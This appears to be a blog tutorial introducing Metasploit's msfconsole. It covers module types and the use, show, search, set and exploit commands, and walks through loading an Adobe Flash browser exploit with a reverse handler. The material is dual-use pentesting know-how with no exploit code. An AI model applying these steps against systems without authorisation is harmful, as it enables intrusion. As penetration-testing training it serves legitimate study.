Metasploit Basics
for Hackers
I. Introduction
Metasploit is the world's leading exploitation/hacker framework. It is used, to some extent, by nearly every hacker/pentester. As such, you really need to become familiar with it if you want to enter and prosper in this burgeoning field.
What is Metasploit?
Metasploit is a standardized framework for use in offensive security or penetration testing. Before Metasploit, exploits, and shellcode would be developed by various developers, in various languages, for various systems. The pentester had to rely upon the trustworthiness of the developer that it was laden with malicious code and learn how the developer intended the exploit/shellcode/tool to work. With Metasploit, the pen-tester has a standardized framework to work from where tools work similarly and all are written in the same language making things much simpler and easier.
Originally developed by HD Moore as an open-source project, it is now owned by the security company, Rapid7 (Rapid7 also owns the vulnerability scanner, Nexpose). Although originally developed as an open-source project, Rapid7 has now developed a Pro version of Metasploit with a few more "bells and whistles". Fortunately, the open-source, community-edition is still available to the rest of us without the tens of thousands of dollars to spend on the Pro version (if you are a professional pentester, the efficiency and time savings accrued in using the Pro version make it a good investment).
Metasploit Interfaces
Metasploit has multiple interfaces including;
(1) msfconsole - an interactive command-line-like interface
(2) msfcli - a literal Linux command line interface
(3) Armitage - a GUI-based third-party application
(4) msfweb - browser-based interface
Undoubtedly, the most common way to use Metasploit is through Metasploit's own interactive shell, msfconsole. In this series on Metasploit, we will be largely using this msfconsole, but I will show you how to use the others in later tutorials.
In recent years, Metasploit has integrated additional tools to make it more than just an exploitation framework. Tools, such as Nmap, Nessus, and Nexpose, are now integrated into Metasploit, so that the entire process of from port scanning, vulnerability scanning, exploitation, and post-exploitation, can all be done from one single tool. In addition, Metasploit has now integrated a PostgreSQL database to store the data collected from your scans and exploits.
II. Getting Started
Before we start Metasploit, we should start the PostgreSQL database. Metasploit will work without PostgreSQL, but this database enables Metasploit to run faster searches and store the information you collect while scanning and exploiting.
Start the PostgreSQL database before starting Metasploit by typing;
kali > service PostgreSQL start
Once the database has been started, you can start the Metasploit Framework console by typing;
As Metasploit loads everything into RAM, it takes a while, so be patient. Eventually, you should get a screen that looks like this
Don't worry if it doesn't look exactly the same as my screen above as Metasploit rotates the opening splash images. As long as you have the msf >prompt, you are in the right place.
This starts the Metasploit console. If you are more GUI oriented, you can go Applications-->Exploitation Tools--> metasploit framework.
III. Metasploit Keywords
Although Metasploit is a very powerful exploitation framework, just a few keywords can get you started hacking just about any system.
Metasploit has six (6) types of modules;
(1) exploits
(2) payloads
(3) auxiliary
(4) nops
(5) post
(6) encoders
A word about terminology though before we start. In Metasploit terminology, an exploit is a module that takes advantage of a system or application vulnerability. It usually will attempt to place a payload on the system. This payload can be a simple command shell or the all-powerful Meterpreter. In other environments, these payloads might be termed listeners or rootkits. You can read more about the different types of payloads in Metasploit Basics, Part3: Payloads
Let's take a look at some of those keyword commands. We can get a list of commands by entering help at the metasploit prompt.
msf > help
Note that we can access this help menu with the "?" as well as "help".
msf > use
The "use" command loads a module. So, for instance, if I wanted to load the exploit/windows/browser/adobe_flash_avm2 module (this is an exploit that takes advantage of one of the many vulnerabilities in the Adobe Flash plug-in), I would enter;
msf > use exploit/windows/browser/adobe_flash_avm2
As you can see above, when Metasploit successfully loads the module, it responds with the type of module (exploit) and the abbreviated module name in red.
msf> showX
After you load a module, the show command can be very useful to gather more information on the module. The three "show" commands I use most often are "show options", "show payloads" and "show targets". Let's take a look at "show payloads" first.
msf > show payloads
This command, when used after selecting your exploit, will show you all the payloads that are compatible with this exploit. If you run this command before selecting an exploit, it will show you ALL payloads, a VERY long list.
As you see in the screenshot above, the show payloads command listed all the payloads that will work with this exploit.
As you see in the screenshot above, the show payloads command listed all the payloads that will work with this exploit.
msf > show options
This command is also very useful in running an exploit. It will display all of the options that need to set before running the module. These options include such things as IP addresses, URI path, the port, etc.
msf > show targets
A less commonly used command is "show targets". Each exploit has a list of the targets it will work against. By using the "show targets" command, we can get a list of them. In this case, targeting is automatic, but some exploits have as many as 100 different targets and success will often depend upon selecting the correct one. These targets can be defined by the operating system, service pack,
msf > info
The info command is simple. When you type it after you have selected a module, it shows you key information about the module, including the options that need to be set, the amount of payload space (more about this in the payloads section), and a description of the module. I usually always run it after selecting my exploit.
msf > search
As a newcomer to Metasploit, the "search" command might be the most useful. When Metasploit was small and new, it was relatively easy to find the right module you needed. Now, with over 3000 modules, finding just the right module can be time-consuming and problematic. Rapid7 added the search function starting with version 4 and it has become a time- and life-saver.
Although you can use the search function to search for keywords, that approach is not always efficient as it will often return a VERY large result set.
To be more specific in your search, you can use the following keywords.
platform - this is the operating system that the module is built for
type - this is the type of module. These include exploits, nops, payloads, post, encoders, and auxiliary
name - if you know the name of the module you can search by its name
The syntax for using search is the keyword followed by a colon and then a value such as;
msf > search type:exploit
For instance, if you were looking for an exploit (type) for Windows (platform) for Abobe Flash, we could type;
For instance, if you were looking for an exploit (type) for Windows (platform) for Abobe Flash, we could type;
msf > search type:exploit platform:windows flash
As you can see above, Metasploit searched its a database for modules that were exploited for the Windows platform and included the keyword "flash".
msf > set
This command is used to set options within the module you selected. For instance, if we look above at the show options command, we can see numerous options that must set such as URIPATH, SVRHOST, and SVRPORT. We can set any of these with the set command such as;
msf > set SRVPORT 80
This changes the default SVRPORT (server port) from 8080 to 80.
msf > unset
This command, as you might expect, unsets the option that was previously set. Such as;
msf > unset SRVPORT
As you can see, we first set the SRVPORT variable to 80 and then unset it. It then reverted back to the default value of 8080 that we can see when we typed show options again.
msf > exploit
Once we have loaded our exploit and set all the necessary options, the final action is "exploit". This sends the exploit to the target system and, if successful, installs the payload.
As you can see in this screenshot, the exploit starts and is running as a background job with a reverse handler on port 4444. It then started a web server on host 0.0.0.0 on port 80 with a randomized URL (F5pmyl9gCHVGw90). We could have chosen a specific URL and set it by changing the URIPATH variable with the set command.
As you can see in this screenshot, the exploit starts and is running as a background job with a reverse handler on port 4444. It then started a web server on host 0.0.0.0 on port 80 with a randomized URL (F5pmyl9gCHVGw90). We could have chosen a specific URL and set it by changing the URIPATH variable with the set command.
msf > back
We can use the back command to take us "back" one step in our process. So, if your instance, we decided that we did not want to use the Adobe/flash/avm2 exploit, we could type "back" and it would remove the loaded exploit.
msf > exit
The exit command, as you would expect, exits us from the msfconsole and back into the BASH command shell.
Notice that in this case, it stops the web server that we created in this exploit and returned us to the Kali command prompt in the BASH shell.
In many exploits, you will see the following options (variables).
RHOST - this is the remote host or target IP
LHOST - this is the local host or attacker IP
RPORT - this is the remote port or target port
LPORT - this is the local port or attacker port
These can all be set, by using the SET command followed by the variable name (RHOST, for instance) and then the value.
msf > SET RHOST 75.75.75.75
Although this is less than an exhaustive list of Metasploit commands, with just these commands you should be able to execute most of the functions in Metasploit. When you need another command in this course, I will take a few minutes to introduce it, but these are all you will likely need, for now.
You can continue this series by going to Metasploit Basics, Part 2 as we explore the most powerful open-source exploitation framework until you become a Metasploit Expert!
No comments:
Post a Comment